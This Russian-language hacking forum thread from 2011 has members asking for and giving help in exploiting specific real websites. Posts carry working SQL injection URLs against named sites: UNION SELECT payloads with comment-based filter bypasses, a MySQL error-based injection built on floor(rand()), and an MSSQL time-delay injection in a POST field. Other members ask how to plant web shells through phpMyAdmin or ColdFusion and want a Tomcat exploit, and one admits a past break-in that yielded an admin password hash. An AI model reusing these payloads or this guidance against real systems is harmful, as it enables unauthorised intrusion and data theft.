Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
    идет фильтрация кавычек...
    как можно обойти?
    заранее спс

    и вот еще интересная
    http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*
     
    #16321 asql, 11 Mar 2011
    Last edited: 11 Mar 2011
  2. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    как залить шелл если имеется доступ только к pma? права root
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://forum.antichat.ru/thread133925-phpmyadmin+shell.html
     
  4. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    а кавычки тут и не нужны, параметр-то числовой
    почему не работает юнион:
    http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true

    помимо гета есть еще и пост
     
    #16324 freezed, 11 Mar 2011
    Last edited: 11 Mar 2011
  5. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    не катит, выдает
    Can't execute query SELECT * FROM families WHERE CatID=32 and substring(version(),1,1)=3 true AND date_archived IS NULL ORDER BY orderval

    Error: You have an error in your SQL syntax near 'true AND date_archived IS NULL ORDER BY orderval' at line 1

    может я что то не так делаю... хз..
     
  6. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    а где ты там вопрос увидел?
     
  7. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    ввожу
    http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3
    выдает норм страницу...
    Вы строго не судите меня, я новичок в этом святом деле=)
    и если можно , то прошу объяснить принцып действия тут вот этого
    именно подбор полей как происходит? типа этого?
    или дайте линк...
     
    #16327 asql, 11 Mar 2011
    Last edited: 11 Mar 2011
  8. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    https://forum.antichat.ru/thread18552-blind+sql.html - вот это
    https://rdot.org/forum/showthread.php?t=245 - потом это
    https://rdot.org/forum/showthread.php?t=503 - и напоследок
    согласно 3 ссылке и описанному там методу MySQL 3 error based inj, раскручивать её можно через вывод в ошибке, т.е (лишние пробелы, вставляемые форумом, убрать)
    Code:
    http://www.hawkingtech.com/products/index.php?CatID=32+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+
     
    1 person likes this.
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Интересует полноценный шелл на Macromedia ColdFusion.
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://forum.antichat.ru/thread239916.html
     
    _________________________
    1 person likes this.
  11. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как называется phpMyAdmin для CFM?

    Заранее спасибо.
     
  12. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Уверн, он просто хочет сломать сайт школы и написать "Галина Сергеевна- дура!!!", т.к. сам учится в этой школе и хочет обосрать математичку/информатичку/директора.
     
    _________________________
  13. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Кстати тоже хотельсьбы узнать (ради опыта) как можно провернуть инъекцию...
    пробовал
    +union+select+N--
    /**/union/**/select/**/N/*
    /**//*!union*//**//*!select*//**/N-- так вообще ноль
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Cold fusion это интерпретируемый язык, а пхп админские панели для управления субд пишутся изходя из различия именно СУБД а не ЯП, так есть phpMyAdmin (для mysql), phpPgAdmin (для постгрес), phpMSAdmin (для MS SQL) и тп :)
    вопрос не очень то корректный, если на сайте интерпретируются только скрипты cfm, то искать панели пхп не имеет смысла :)
     
    _________________________
  15. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    взгляните опытным взглядом
    http://www.pwlvl.ru/news/?page=-2
    я его раньше ломал, потом ту дырку прикрыли (остался долько логин и md5(пароль) админа))
     
  16. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Там нету скули. intval()
     
  17. StolenMan

    StolenMan New Member

    Joined:
    11 Mar 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Привет.
    На сайте есть инъекция (mssql) в POST запросе (при редактировании профиля). Как я понял инъекция в операторе UPDATE...

    addressDef=-1,'0','0','0','0','0','0','0','0';waitfor+delay+'00:00:10'--

    Есть ли возможность получать данные если на место waitfordelay влепить select @@version к примеру? Пробовал конвертировать в int - ошибки не возникало...
     
  18. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    Apache Tomcat/6.0.26

    есть какой-то сплоит?
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    link
     
  20. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    да я это видел но нигде нету конкретного примера
     
Thread Status:
Not open for further replies.